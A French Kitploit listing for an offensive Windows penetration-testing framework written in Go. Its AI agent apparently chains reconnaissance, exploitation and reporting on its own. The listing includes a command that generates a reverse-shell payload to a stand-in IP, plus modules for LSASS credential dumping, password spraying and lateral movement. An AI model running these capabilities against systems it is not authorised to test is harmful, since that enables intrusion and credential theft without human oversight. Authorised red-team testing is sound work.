Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FUCKER — Framework de test d'intrusion avec moteur de décision piloté par l'IA | Kitploit
Outils/GitHubGitHub/razureink/fucker
Frameworks de Tests d'IntrusionReconnaissanceScanners de Vulnérabilités WebAnalyse des VulnérabilitésExploitationMouvement LatéralPost-ExploitationCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHub
il y a 27 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
razureink/fucker

FUCKER

Framework de test d'intrusion avec moteur de décision piloté par l'IA

Voir le dépôt
Partager

FUCKER

Framework de test de pénétration natif Windows écrit en Go. Architecture modulaire avec moteur de décision piloté par IA (API compatible OpenAI).

Compilation

root@kitploit:~
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/

Compilation croisée :

root@kitploit:~
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/

Utilisation

root@kitploit:~
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"

Options

Configuration

Copiez .env.example vers .env :

Sans configuration IA, l'outil fonctionne en mode CLI manuel (toutes les options fonctionnent normalement).

Modules

Mode IA

Lorsque OPENAI_API_KEY est définie, l'outil exécute une boucle ReAct : l'agent IA décide quels outils appeler en fonction des résultats précédents. Le prompt système définit un workflow de pentest : reconnaissance -> empreinte -> scan de vulnérabilités -> exploitation -> rapport.

Sans IA, toutes les fonctionnalités sont disponibles via les options CLI.

Notes

  • Droits administrateur requis pour le minidump LSASS et les opérations sur les jetons
  • Les clés API sont automatiquement masquées dans les journaux
Télécharger l’outil
OptionDescription
-tDomaine/IP/URL cible
-pPorts (virgule ou plage, défaut : 80,443,22,21,3389,3306,6379,27017)
-subdomainÉnumération de sous-domaines
-portscanScan de ports TCP
-fingerprintEmpreinte de services
-dirbusterForce brute de répertoires
-vulnscanScan de vulnérabilités basé sur des POC
-logicVérifications des vulnérabilités logiques
-sprayPulvérisation de mots de passe
-exploitModules d'exploitation
-reportGénérer un rapport HTML + JSON
-oFichier de sortie (défaut : report.html)
-socksDémarrer un proxy SOCKS5 sur le port
-httpproxyDémarrer un proxy HTTP sur le port
-forwardRedirection de port (local:host:remote)
-payloadGénérer un payload (revshell|IP|PORT)
-vMode verbeux
-debugSortie de débogage
-workersWorkers simultanés (défaut : 20)
-timeoutDélai d'expiration des requêtes en secondes (défaut : 30)
-proxyURL du proxy
-auditChemin du journal d'audit (défaut : audit.json)
VariableDescription
OPENAI_BASE_URLURL de base de l'API compatible OpenAI
OPENAI_API_KEYClé API
OPENAI_MODEL_NAMEModèle (défaut : gpt-4)
PROXYURL du proxy
MAX_WORKERSNombre maximal de workers (défaut : 20)
REQUEST_TIMEOUTDélai d'expiration en secondes (défaut : 30)
RETRY_COUNTNouvelles tentatives (défaut : 3)
PackageDescription
cmd/fucker/Point d'entrée, analyse CLI, orchestration des modules
internal/ai/Client OpenAI, boucle d'agent ReAct, système d'outils
internal/scanner/Scan de ports, sous-domaines, empreinte, dirbuster
internal/vuln/Moteur de POC YAML, 16 POC intégrés, vérificateurs logiques
internal/exploit/Générateur de reverse shell, proxy SOCKS5/HTTP, memshell
internal/lateral/Pulvérisation de mots de passe, minidump LSASS, proxy SMB/RDP
internal/report/Rapport basé sur un modèle HTML, export JSON, évaluation des risques
internal/logger/Journalisation hiérarchisée, piste audit.json
internal/plugin/Chargeur de plugins Python/Go
internal/config/Chargeur .env
internal/common/Types partagés